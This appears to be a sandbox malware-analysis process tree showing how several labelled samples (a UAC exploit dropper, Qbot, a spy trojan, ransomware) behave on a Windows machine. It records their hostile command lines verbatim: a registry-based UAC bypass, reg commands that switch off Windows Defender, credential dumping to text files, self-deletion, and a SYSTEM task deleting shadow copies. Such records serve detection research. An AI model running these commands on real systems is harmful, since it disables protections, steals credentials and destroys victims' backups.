C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3456
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:5244
-
C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"1⤵
- Executes dropped EXE
PID:6060 -
C:\Users\Admin\AppData\Local\Temp\is-L2OC7.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp"C:\Users\Admin\AppData\Local\Temp\is-L2OC7.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp" /SL5="$F026A,3872572,832512,C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
PID:6020 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\WindowsPowerShell\Configuration\errorfake.vbs"3⤵PID:2144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.uac.bat" "3⤵PID:2176
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f4⤵
- Modifies registry class
PID:3356
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f4⤵
- Modifies registry class
PID:3168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.wdcloud.bat" "3⤵PID:1944
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:2100
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:1644
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:3916
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:5196
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5304
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5232
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2016
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4332
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3464
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:3664
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f4⤵PID:5088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:5576
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f4⤵PID:5504
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f4⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f4⤵PID:5560
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f4⤵PID:5368
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"3⤵PID:2312
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\main.bat" "4⤵PID:1788
-
C:\Windows\SysWOW64\mode.commode 65,105⤵PID:2620
-
-
C:\ProgramData\7z.exe7z.exe e file.zip -p___________26681pwd226pwd25461___________ -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5300
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_11.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5536
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_10.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3288
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_9.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5304
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_8.zip -oextracted5⤵
- Executes dropped EXE
PID:2016
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
- Executes dropped EXE
PID:1976
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
PID:1936
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
PID:2332
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
PID:5304
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
PID:3936
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
PID:5296
-
-
C:\ProgramData\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
PID:3004
-
-
C:\Windows\SysWOW64\attrib.exeattrib +H "MBSetup.exe"5⤵
- Views/modifies file attributes
PID:2332
-
-
C:\ProgramData\MBSetup.exe"MBSetup.exe"5⤵
- Executes dropped EXE
PID:5732 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 11126⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5604
-
-
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"3⤵PID:4296
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.delete.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:1716 -
C:\Windows\SysWOW64\PING.EXEping -n 60 127.15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:6552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del 7z.dll"5⤵PID:5252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del 7z.exe"5⤵PID:5508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:5548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del main.bat"5⤵PID:5248
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del file.bin"5⤵PID:4536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:5148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.run.vbs"5⤵PID:6724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵
- System Location Discovery: System Language Discovery
PID:2148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.2run.vbs"5⤵PID:7104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:3312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.uac.bat"5⤵PID:2132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:6892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.wdcloud.bat"5⤵
- System Location Discovery: System Language Discovery
PID:3984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:7080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del wu10.delete.bat"5⤵PID:6604
-
-
-
-
-
C:\Users\Admin\Desktop\Backdoor.Win32.Xaparo.jl-4723ab5ed01fb642eb602ff59309d4d698e6011145ca1b757bb223b5a67fe159.exe"C:\Users\Admin\Desktop\Backdoor.Win32.Xaparo.jl-4723ab5ed01fb642eb602ff59309d4d698e6011145ca1b757bb223b5a67fe159.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7020 -
C:\Windows\SysWOW64\calc.exe"C:\Users\Admin\Desktop\Backdoor.Win32.Xaparo.jl-4723ab5ed01fb642eb602ff59309d4d698e6011145ca1b757bb223b5a67fe159.exe"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
PID:6456
-
-
C:\Users\Admin\Desktop\Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe"C:\Users\Admin\Desktop\Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SendNotifyMessage
PID:5792 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:6708
-
-
C:\Users\Admin\Desktop\Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe"C:\Users\Admin\Desktop\Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SendNotifyMessage
PID:716 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵
- Suspicious use of SetThreadContext
PID:6772 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"3⤵
- Accesses Microsoft Outlook accounts
PID:6168
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"3⤵PID:4776
-
-
-
C:\Users\Admin\Desktop\Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe"C:\Users\Admin\Desktop\Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe"1⤵
- Executes dropped EXE
PID:6952 -
C:\Users\Admin\Desktop\Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exeC:\Users\Admin\Desktop\Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe /C2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:2036
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\Desktop\Trojan-Banker.Win32.Qbot.smd-6a98f6b4d04e5eaa80bf32e1fee56b6e924e14a2090bd7d37c2e243049536870.exe"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2336 -
C:\Windows\SysWOW64\PING.EXEping.exe -n 6 127.0.0.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6140
-
-
-
C:\Users\Admin\Desktop\HEUR-Trojan.Win32.Zenpak.vho-67f5f5877302d6bc59d848551fb22b8e2ed67fe08eec0d049849c1fae4f04819.exe"C:\Users\Admin\Desktop\HEUR-Trojan.Win32.Zenpak.vho-67f5f5877302d6bc59d848551fb22b8e2ed67fe08eec0d049849c1fae4f04819.exe"1⤵
- Executes dropped EXE
PID:2004
-
C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe"C:\Users\Admin\Desktop\HEUR-Trojan-Banker.Win32.BestaFera.gen-459f47867adaa021b11ba6ac50c1a4784902cf750b917c957abe9e91bd1fb8a0.exe"1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:7888
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
PID:5984
-
C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Loo.c-924cc338d5d03f8914fe54f184596415563c4172679a950245ac94c80c023c7d.exe"C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Loo.c-924cc338d5d03f8914fe54f184596415563c4172679a950245ac94c80c023c7d.exe"1⤵
- Sets desktop wallpaper using registry
PID:6340
-
C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Encoder.hzw-5f97741d6beab5fb38e7821c36e7e2662fc3dfc7d01f1248d844599e0bbd730d.exe"C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Encoder.hzw-5f97741d6beab5fb38e7821c36e7e2662fc3dfc7d01f1248d844599e0bbd730d.exe"1⤵PID:5000
-
C:\Windows\system32\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\temp.exe2⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\temp.exeC:\Users\Admin\AppData\Local\Temp\temp.exe3⤵PID:5532
-
C:\Windows\system32\cmd.execmd /c ping 127.0.0.1 & del C:\Users\Admin\AppData\Local\Temp\temp.exe4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6644 -
C:\Windows\system32\PING.EXEping 127.0.0.15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5688
-
-
-
C:\Windows\system32\cmd.execmd /c start C:\Users\Admin\desktop\Read_Bug.html4⤵PID:2824
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\Read_Bug.html5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:7524 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb4d4d3cb8,0x7ffb4d4d3cc8,0x7ffb4d4d3cd86⤵PID:1976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:26⤵PID:6408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 /prefetch:36⤵PID:6204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:86⤵PID:5368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:16⤵PID:5952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:16⤵PID:7568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:16⤵PID:2088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:16⤵PID:7512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:16⤵PID:7820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:16⤵PID:7788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4568 /prefetch:86⤵PID:2496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1264 /prefetch:86⤵PID:5180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,12339578592982882786,16392828178714666723,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5884 /prefetch:26⤵PID:7640
-
-
-
-
-
-
C:\Users\Admin\Desktop\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe"C:\Users\Admin\Desktop\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe"1⤵PID:3664
-
C:\Users\Admin\Desktop\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe"C:\Users\Admin\Desktop\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe"2⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5020 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /create /tn updater47 /sc once /sd 01/01/1901 /tr "vssadmin Delete Shadows /All /Quiet" /st 00:00 /rl highest /ru SYSTEM /f"3⤵PID:6760
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn updater47 /sc once /sd 01/01/1901 /tr "vssadmin Delete Shadows /All /Quiet" /st 00:00 /rl highest /ru SYSTEM /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:6712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /run /i /tn updater47"3⤵PID:7716
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /i /tn updater474⤵PID:5816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "schtasks /delete /tn updater47 /f"3⤵
- Indicator Removal: Clear Persistence
- System Location Discovery: System Language Discovery
PID:8100 -
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn updater47 /f4⤵PID:5220
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5600
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5344
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5408 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb6034cc40,0x7ffb6034cc4c,0x7ffb6034cc582⤵PID:5656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2172,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=2096 /prefetch:22⤵PID:4580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1692,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=2480 /prefetch:32⤵PID:4296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1892,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=2572 /prefetch:82⤵PID:7084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3036,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=3056 /prefetch:12⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=3296 /prefetch:12⤵PID:7532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,18240363495030338988,3395801084027393860,262144 --variations-seed-version=20241119-050110.198000 --mojo-platform-channel-handle=4436 /prefetch:12⤵PID:7028
-
-
